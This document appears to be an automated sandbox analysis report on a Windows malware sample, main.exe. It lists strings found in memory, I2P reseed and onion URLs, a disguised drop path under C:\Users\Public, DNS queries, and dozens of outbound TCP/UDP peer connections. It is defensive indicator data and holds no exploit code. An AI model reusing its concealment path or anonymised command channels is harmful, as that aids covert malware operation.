Source: main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000014.00000002.2559133821.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000014.00000003.1930520488.0000013B4569B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000014.00000002.2557742278.0000013B45297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000014.00000002.2557742278.0000013B45297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/
Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/B
Source: main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/
Source: main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/B
Source: main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: NCdDxWNe.20.dr	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/

Performs DNS queries to domains with low reputation

Source:

DNS query: reseed-pl.i2pd.xyz

Uses TOR for connection hidding

Source: unknown

DNS query: name: reseed.onion.im

Source: unknown

Network traffic detected: IP country count 22

Source: global traffic	TCP traffic: 192.168.2.4:49730 -> 45.200.148.158:1129
Source: global traffic	TCP traffic: 192.168.2.4:49852 -> 78.162.217.132:23193
Source: global traffic	TCP traffic: 192.168.2.4:49854 -> 76.26.184.38:11367
Source: global traffic	TCP traffic: 192.168.2.4:49853 -> 95.158.36.98:30125
Source: global traffic	TCP traffic: 192.168.2.4:49855 -> 78.22.234.134:19663
Source: global traffic	TCP traffic: 192.168.2.4:49856 -> 83.6.222.32:4587
Source: global traffic	TCP traffic: 192.168.2.4:49857 -> 24.60.181.65:16477
Source: global traffic	TCP traffic: 192.168.2.4:49858 -> 217.156.67.239:26529
Source: global traffic	TCP traffic: 192.168.2.4:49860 -> 46.138.247.227:45301
Source: global traffic	TCP traffic: 192.168.2.4:49859 -> 94.131.171.105:26872
Source: global traffic	TCP traffic: 192.168.2.4:49866 -> 96.245.131.50:20033
Source: global traffic	TCP traffic: 192.168.2.4:49867 -> 24.128.131.37:19244
Source: global traffic	TCP traffic: 192.168.2.4:49869 -> 185.177.216.199:16669
Source: global traffic	TCP traffic: 192.168.2.4:49870 -> 173.209.166.184:57108
Source: global traffic	TCP traffic: 192.168.2.4:49872 -> 86.45.126.166:13159
Source: global traffic	TCP traffic: 192.168.2.4:49873 -> 175.215.255.118:31497
Source: global traffic	TCP traffic: 192.168.2.4:49874 -> 88.209.121.106:62766
Source: global traffic	TCP traffic: 192.168.2.4:49875 -> 193.148.16.211:26842
Source: global traffic	TCP traffic: 192.168.2.4:49876 -> 5.161.229.21:30354
Source: global traffic	TCP traffic: 192.168.2.4:49949 -> 89.223.52.84:27690
Source: global traffic	TCP traffic: 192.168.2.4:50046 -> 134.16.78.198:29107
Source: global traffic	TCP traffic: 192.168.2.4:50047 -> 139.59.231.96:11507
Source: global traffic	TCP traffic: 192.168.2.4:50048 -> 73.31.50.204:11435
Source: global traffic	TCP traffic: 192.168.2.4:50049 -> 193.233.193.76:4567
Source: global traffic	TCP traffic: 192.168.2.4:50050 -> 95.31.23.9:17903
Source: global traffic	TCP traffic: 192.168.2.4:50051 -> 79.119.11.221:13529
Source: global traffic	TCP traffic: 192.168.2.4:50052 -> 72.199.129.69:28562
Source: global traffic	TCP traffic: 192.168.2.4:50053 -> 184.65.173.183:21143
Source: global traffic	TCP traffic: 192.168.2.4:50054 -> 23.137.250.43:24642
Source: global traffic	TCP traffic: 192.168.2.4:50056 -> 46.139.242.51:14602
Source: global traffic	TCP traffic: 192.168.2.4:50057 -> 120.26.116.232:15559
Source: global traffic	TCP traffic: 192.168.2.4:50058 -> 174.119.206.85:32791
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 150.230.127.230:10500
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 218.156.39.195:34643
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 95.105.66.5:4327
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 73.114.39.41:10449
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 135.181.93.228:24635
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 72.83.161.95:59836
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 185.121.12.251:25677
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 99.252.122.69:15928
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 98.16.145.157:14447
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 87.106.66.194:28800
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 184.144.18.148:5088
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 188.211.91.73:18034
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 94.177.106.53:53254
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 91.82.213.104:21140
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 46.209.176.184:17024
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 88.228.207.122:16453
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 73.27.22.30:11739
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 87.219.13.126:23154
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 138.74.168.219:27694
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 207.246.88.73:16205
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 77.238.224.240:17146
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 112.16.103.31:10651
Source: global traffic	UDP traffic: 192.168.2.4:14015 -> 73.155.122.99:17078
Source: global traffic	UDP traffic: 192.168.2.4:10511 -> 136.60.17.104:21248
Source: global traffic	UDP traffic: 192.168.2.4:10511 -> 85.23.104.222:15068
Source: global traffic	UDP traffic: 192.168.2.4:10511 -> 217.24.233.6:14696

Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknown	TCP traffic detected without corresponding DNS query: 45.200.148.158

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 20_2_00007FFE0E162A1A recv,WSAGetLastError,

20_2_00007FFE0E162A1A

Source: global traffic	HTTP traffic detected: GET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global traffic	HTTP traffic detected: GET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global traffic	HTTP traffic detected: GET https://reseed.diva.exchange:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global traffic	HTTP traffic detected: GET https://reseed.onion.im:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close

Source: global traffic	DNS traffic detected: DNS query: reseed-pl.i2pd.xyz
Source: global traffic	DNS traffic detected: DNS query: reseed.i2pgit.org
Source: global traffic	DNS traffic detected: DNS query: reseed.diva.exchange
Source: global traffic	DNS traffic detected: DNS query: reseed.onion.im

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 19:26:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-Encoding

Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000003.1898592051.0000013B45248000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000003.1898541929.0000013B45243000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000003.2661057466.00000201EB4A8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000003.2660987884.00000201EB4A3000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	String found in binary or memory: http://127.0.0.1:8118
Source: main.exe, 00000014.00000003.1898592051.0000013B45248000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000003.1898541929.0000013B45243000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:8118(
Source: main.exe, 0000001F.00000003.2661057466.00000201EB4A8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000003.2660987884.00000201EB4A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:8118J?
Source: 80P.exe	String found in binary or memory: http://digitalbush.com/projects/masked-input-plugin/#license)
Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	String found in binary or memory: http://identiguy.i2p/hosts.txt
Source: main.exe, 00000014.00000002.2557742278.0000013B45297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935350679.00000201EB8FF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr, NCdDxWNe.20.dr	String found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000014.00000002.2557908253.0000013B4567C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtL
Source: main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtl
Source: main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtr
Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	String found in binary or memory: http://rus.i2p/hosts.txt
Source: main.exe, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr, NCdDxWNe.20.dr	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtf
Source: main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	String found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: Amcache.hve.29.dr	String found in binary or memory: http://upx.sf.net
Source: 80P.exe	String found in binary or memory: http://www.mozilla.org/editor/midasdemo/securityprefs.html
Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://banana.incognet.io/
Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://i2p.ghativega.in/
Source: main.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i2p.ghativega.in/p/p_lib.c
Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	String found in binary or memory: https://i2p.mooo.com/netDb/
Source: main.exe, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://i2p.novg.net/
Source: main.exe, 00000014.00000002.2557742278.0000013B45238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i2p.novg.net/V
Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	String found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: main.exe, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	String found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	String found in binary or memory: https://netdb.i2p2.no/
Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: main.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed-fr.i2pd.xyz/p_lib.c
Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed-pl.i2pd.xyz/p_lib.c
Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://reseed.diva.exchange/
Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	String found in binary or memory: https://reseed.i2p-projekt.de/
Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://reseed.i2pgit.org/
Source: main.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.i2pgit.org//p_lib.c
Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.i2pgit.org/A
Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://reseed.memcpy.io/
Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://reseed.onion.im/
Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/B
Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://reseed.stormycloud.org/
Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.stormycloud.org/k
Source: main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://reseed2.i2p.net/
Source: main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/hO
Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2557742278.0000013B45238000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2559133821.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	String found in binary or memory: https://www2.mk16.de/
Source: main.exe, 00000014.00000002.2557742278.0000013B45238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www2.mk16.de/(

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

